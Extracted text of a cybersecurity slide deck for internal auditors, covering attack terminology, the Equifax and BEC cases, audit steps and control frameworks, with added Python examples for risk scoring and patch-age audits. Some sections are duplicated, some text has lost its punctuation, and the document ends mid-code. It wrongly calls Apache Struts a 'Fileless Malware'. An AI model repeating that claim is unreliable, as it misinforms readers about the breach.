• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, i.e. to identify, estimate and prioritize information security risks
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
37
38
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
Example screenshot of a critical data asset risk assessment
40
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest priority, most impactful controls that should be implemented first
41
• The Baseline Gap Analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
MITIGATING CONTROL COUNTS (bar chart of counts per control; values not reproduced)
A) Identify information systems with calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
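The Step 1 risk calculation and the Step 3 control-count procedure (A through D) worked through in Python, as an added example that is not part of the presentation or any Stinnett & Associates tool. The scoring scales (likelihood 1-5, impact 1-5, asset classification 1-10, multiplied together so the deck's ">100" threshold sits near the top of the range), the threat-to-control mapping and the systems in the register are assumptions or constructed sample data.

```python
"""Semi-quantitative risk scoring (Step 1) and mitigating-control counts (Step 3).

Added illustration, not part of the presentation or any Stinnett & Associates
tool. The scoring scales, the use of the ">100" threshold and the
threat-to-control mapping are assumptions; all systems and scores are
constructed sample data.
"""
from collections import Counter
from dataclasses import dataclass

# Assumed scales: likelihood 1-5, impact 1-5, asset classification weight 1-10.
# risk = likelihood * impact * classification (maximum 250), so the deck's
# "calculated cybersecurity risk > 100" threshold selects the top of the range.
RISK_THRESHOLD = 100

# Assumed mapping from threat to the controls that reduce it. Control names are
# ones the deck discusses; which control mitigates which threat is illustrative.
MITIGATING_CONTROLS = {
    "Ransomware": [
        "Patch Management", "Endpoint Protection",
        "Backups and Recovery", "Security Awareness Training",
    ],
    "Phishing / BEC": [
        "Security Awareness Training", "Multi-factor Authentication",
        "Vendor Bank-Change Verification",
    ],
    "Exploited known vulnerability": [
        "Patch Management", "Network Vulnerability Scanning",
    ],
    "Privileged account misuse": [
        "Least Privilege Access Review", "Multi-factor Authentication",
        "Privilege Change Monitoring",
    ],
}


@dataclass(frozen=True)
class ThreatScore:
    """One row of the risk register: a specific threat against one system."""
    system: str
    threat: str
    likelihood: int      # 1-5
    impact: int          # 1-5
    classification: int  # 1-10, from the asset classification in Step 1

    def risk(self) -> int:
        return self.likelihood * self.impact * self.classification


def systems_over_threshold(scores, threshold=RISK_THRESHOLD):
    """Step A: information systems with at least one threat risk above threshold."""
    return sorted({s.system for s in scores if s.risk() > threshold})


def threats_over_threshold(scores, threshold=RISK_THRESHOLD):
    """Step B: the specific (system, threat) rows whose own risk is above threshold."""
    return [s for s in scores if s.risk() > threshold]


def mitigating_control_counts(scores, mapping=MITIGATING_CONTROLS,
                              threshold=RISK_THRESHOLD):
    """Steps C and D: count every instance in which a control reduces an
    over-threshold risk. A control that addresses many high risks scores high."""
    counts = Counter()
    for row in threats_over_threshold(scores, threshold):
        for control in mapping.get(row.threat, []):
            counts[control] += 1
    return counts


def prioritized_controls(scores, **kwargs):
    """Controls ordered by how many high risks they mitigate (ties alphabetical):
    the input to the implementation roadmap the deck describes."""
    counts = mitigating_control_counts(scores, **kwargs)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample register (hypothetical systems; risk value in comments).
SAMPLE_SCORES = [
    ThreatScore("Payroll system", "Phishing / BEC", 4, 5, 9),                           # 180
    ThreatScore("Payroll system", "Ransomware", 3, 5, 9),                               # 135
    ThreatScore("Customer claims web portal", "Exploited known vulnerability", 5, 5, 8),  # 200
    ThreatScore("Customer claims web portal", "Privileged account misuse", 2, 4, 8),      # 64
    ThreatScore("Marketing file share", "Ransomware", 4, 2, 3),                         # 24
    ThreatScore("Treasury workstation", "Phishing / BEC", 3, 5, 10),                    # 150
    ThreatScore("Treasury workstation", "Privileged account misuse", 3, 4, 10),         # 120
]

if __name__ == "__main__":
    print("Systems over threshold:", systems_over_threshold(SAMPLE_SCORES))
    for control, n in prioritized_controls(SAMPLE_SCORES):
        print(f"{n:2d}  {control}")
```

With the sample register, multi-factor authentication and security awareness training each reduce three of the five over-threshold risks, which is the kind of ranking the control-count chart presents.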
42
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter?
Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%) – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework – Source: itgovernanceusa.com
43
44
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
45
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
46
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures. This includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices on their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
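An added example (not from the presentation) of the patch-management audit test the slide describes: reconcile the IT device inventory against what the vulnerability scanner actually covered, then age every open finding against the vendor's patch release date. The tolerances (30 days for internet-facing devices, 90 days internal, one year as critical) are assumptions; the hostnames, finding identifiers and dates are constructed sample data.

```python
"""Audit test for patch management: reconcile the IT device inventory against
vulnerability-scanner coverage, then age every open finding by the date the
vendor released the patch.

Added illustration, not part of the presentation. The patch-age tolerances are
assumptions; the inventory, scan export, finding identifiers and dates are
constructed sample data (VULN-xxxx are placeholders, not real CVE numbers).
"""
from dataclasses import dataclass
from datetime import date

# Assumed tolerances: days allowed between vendor patch release and installation.
MAX_PATCH_AGE_DAYS = {"internet-facing": 30, "internal": 90}
# The deck notes most exploited vulnerabilities were compromised more than a
# year after the patch was published, so anything older than that is critical.
CRITICAL_AGE_DAYS = 365


@dataclass(frozen=True)
class Device:
    hostname: str
    exposure: str  # "internet-facing" or "internal"


@dataclass(frozen=True)
class Finding:
    hostname: str
    vuln_id: str          # placeholder identifier
    patch_released: date  # date the vendor made the fix available


def unscanned_devices(inventory, scanned_hosts):
    """Coverage gap: inventoried devices the scanner never reported on."""
    return sorted(d.hostname for d in inventory if d.hostname not in scanned_hosts)


def unknown_hosts(inventory, scanned_hosts):
    """Unknown devices: hosts the scanner saw that are missing from the inventory."""
    known = {d.hostname for d in inventory}
    return sorted(h for h in scanned_hosts if h not in known)


def overdue_findings(inventory, findings, as_of):
    """Open findings whose patch age exceeds the tolerance for the device's
    exposure. Returns (hostname, vuln_id, age_days, severity), oldest first.
    Hosts missing from the inventory get the internal tolerance; pair this with
    unknown_hosts() so such devices are not silently accepted."""
    exposure = {d.hostname: d.exposure for d in inventory}
    results = []
    for f in findings:
        limit = MAX_PATCH_AGE_DAYS[exposure.get(f.hostname, "internal")]
        age = (as_of - f.patch_released).days
        if age > limit:
            severity = "critical" if age > CRITICAL_AGE_DAYS else "overdue"
            results.append((f.hostname, f.vuln_id, age, severity))
    return sorted(results, key=lambda r: -r[2])


# Constructed sample data.
AS_OF = date(2019, 3, 1)
INVENTORY = [
    Device("web01", "internet-facing"),
    Device("app01", "internal"),
    Device("hr-fs01", "internal"),
    Device("prn-lobby", "internal"),
]
SCANNED_HOSTS = {"web01", "app01", "hr-fs01", "cam-07"}
FINDINGS = [
    Finding("web01", "VULN-0001", date(2018, 1, 15)),    # 410 days old
    Finding("web01", "VULN-0002", date(2019, 2, 10)),    # 19 days old
    Finding("app01", "VULN-0003", date(2018, 11, 20)),   # 101 days old
    Finding("hr-fs01", "VULN-0004", date(2019, 1, 1)),   # 59 days old
]


def audit_summary(inventory=INVENTORY, scanned=SCANNED_HOSTS,
                  findings=FINDINGS, as_of=AS_OF):
    """The three questions an auditor asks of the patch process, in one result."""
    return {
        "unscanned": unscanned_devices(inventory, scanned),
        "unknown": unknown_hosts(inventory, scanned),
        "overdue": overdue_findings(inventory, findings, as_of),
    }


if __name__ == "__main__":
    for key, value in audit_summary().items():
        print(f"{key}: {value}")
```

On the sample data the lobby printer never appears in a scan, a camera appears in scans but not in the inventory, and the internet-facing web server carries a year-old unpatched finding: each is a separate audit exception.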
47
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco, Principal – mobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett & Associates – stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons companies struggle are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH: PEOPLE, PROCESSES, TECHNOLOGY
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on the implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments -> Create a Baseline / Gap Analysis -> Implement and Manage Controls -> Assess & Report -> repeat
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, that is, to identify, estimate and prioritize information security risks
Process: Identification of Assets -> Asset Locations -> Classification of Assets -> Threat Modeling -> Calculated Risk Results
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
[Example screenshot of a critical data asset risk assessment]
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest-priority, most impactful controls that should be implemented first
STEP 3 - CONTROLS ANALYSIS
• The Baseline Gap Analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
[Chart: Mitigating Control Counts]
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes / No)? If yes, move to the next step
C) Identify mitigating controls to implement to mitigate the threat
D) Total all instances where controls reduced risk
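The Step 1 risk calculation and the Step 3 counting method (A through D above) carried through on a small constructed inventory. This is an added example and not the presentation's or Stinnett & Associates' own model: the scoring scale (asset value 1-10 times likelihood 1-5 times impact 1-5), the threshold of 100, the threat catalogue and the threat-to-control mapping are all assumptions chosen so that the arithmetic is easy to follow.

```python
"""Added example: semi-quantitative risk scoring and mitigating-control counts.

risk(system, threat) = asset_value (1-10) * likelihood (1-5) * impact (1-5)

A) systems whose highest threat risk exceeds RISK_THRESHOLD are in scope;
B) each (system, threat) pair over the threshold is a finding;
C) each finding maps to the controls that mitigate that threat;
D) the count per control is how many findings it reduces.

Scale, threshold, systems, threats and the control mapping are assumptions.
"""
from collections import Counter

RISK_THRESHOLD = 100

# Constructed inventory: asset value reflects the data the system holds.
SYSTEMS = {
    "ERP":            {"asset_value": 10, "data": "bank accounts, vendor master"},
    "HR system":      {"asset_value": 8,  "data": "employee records"},
    "Marketing site": {"asset_value": 2,  "data": "public content"},
}

# (likelihood, impact) per (system, threat), as judged in assessment workshops.
THREAT_SCORES = {
    ("ERP", "business email compromise"): (5, 5),
    ("ERP", "unpatched vulnerability"):   (4, 5),
    ("ERP", "ransomware"):                (3, 5),
    ("HR system", "phishing"):            (5, 4),
    ("HR system", "ransomware"):          (3, 3),
    ("Marketing site", "web defacement"): (4, 3),
}

# Controls that mitigate each threat (assumed mapping to a control catalogue).
MITIGATING_CONTROLS = {
    "business email compromise": ["multi-factor authentication", "vendor bank-change verification"],
    "unpatched vulnerability":   ["patch management", "vulnerability scanning"],
    "ransomware":                ["endpoint protection", "tested offline backups", "patch management"],
    "phishing":                  ["security awareness training", "multi-factor authentication"],
    "web defacement":            ["patch management", "web application firewall"],
}


def risk_score(system, likelihood, impact):
    """Step 1: asset value weighted by how likely and how damaging the threat is."""
    return SYSTEMS[system]["asset_value"] * likelihood * impact


def threat_findings():
    """Step B: every (system, threat, score) whose score exceeds the threshold, highest first."""
    findings = []
    for (system, threat), (likelihood, impact) in THREAT_SCORES.items():
        score = risk_score(system, likelihood, impact)
        if score > RISK_THRESHOLD:
            findings.append((system, threat, score))
    return sorted(findings, key=lambda f: -f[2])


def systems_in_scope():
    """Step A: systems with at least one threat over the threshold."""
    return sorted({system for system, _, _ in threat_findings()})


def mitigating_control_counts():
    """Steps C and D: how many over-threshold findings each control reduces."""
    counts = Counter()
    for _, threat, _ in threat_findings():
        counts.update(MITIGATING_CONTROLS[threat])
    return counts


if __name__ == "__main__":
    print("In scope:", systems_in_scope())
    for system, threat, score in threat_findings():
        print(f"  {system:15} {threat:28} risk={score}")
    for control, n in mitigating_control_counts().most_common():
        print(f"{n:2}  {control}")
```

Reading the output the way the slide's chart is read: the controls with the highest counts (here patch management and multi-factor authentication, each reducing two findings) are the ones to put first on the implementation roadmap, because they reduce risk across the most critical assets.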
STEP 4 - CYBERSECURITY REPORTING
• Leverage information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
COBIT process capability levels:
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Recommended Security Controls for Federal Information Systems and Organizations
• NIST Cyber Security Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly SANS Top 20)
International Organization for Standardization
• ISO 27001 family – Information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). – Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework in their organization and 44% use more than one framework. – Source: itgovernanceusa.com
CENTER FOR INTERNET SECURITY – CRITICAL SECURITY CONTROLS
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX.
• Confirm IT is not using privileged accounts for daily tasks, which can include browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company's overall cybersecurity training and awareness program
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place.
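The vulnerability-management points above turned into an audit test: a device is an exception when a vendor patch has been outstanding for more than a year (the "99%" point) and no formal risk acceptance covers it, and hosts seen on the network but missing from the inventory are reported separately because they cannot be tested at all. This is an added example, not the presentation's or Stinnett & Associates' own tooling; the inventory fields, hostnames, dates and the one-year tolerance are constructed assumptions.

```python
"""Added example: patch-age audit over a constructed device inventory.

Exception     - patch available for more than PATCH_AGE_LIMIT_DAYS, not applied,
                no tracked risk acceptance.
Accepted risk - same gap, but management formally accepted and tracks it.
Within tolerance - patch applied, or outstanding for less than the limit.
Not in inventory - host seen by the network scan but absent from the inventory,
                so its patch state is unknown.

All hosts, dates and field names are sample data.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional

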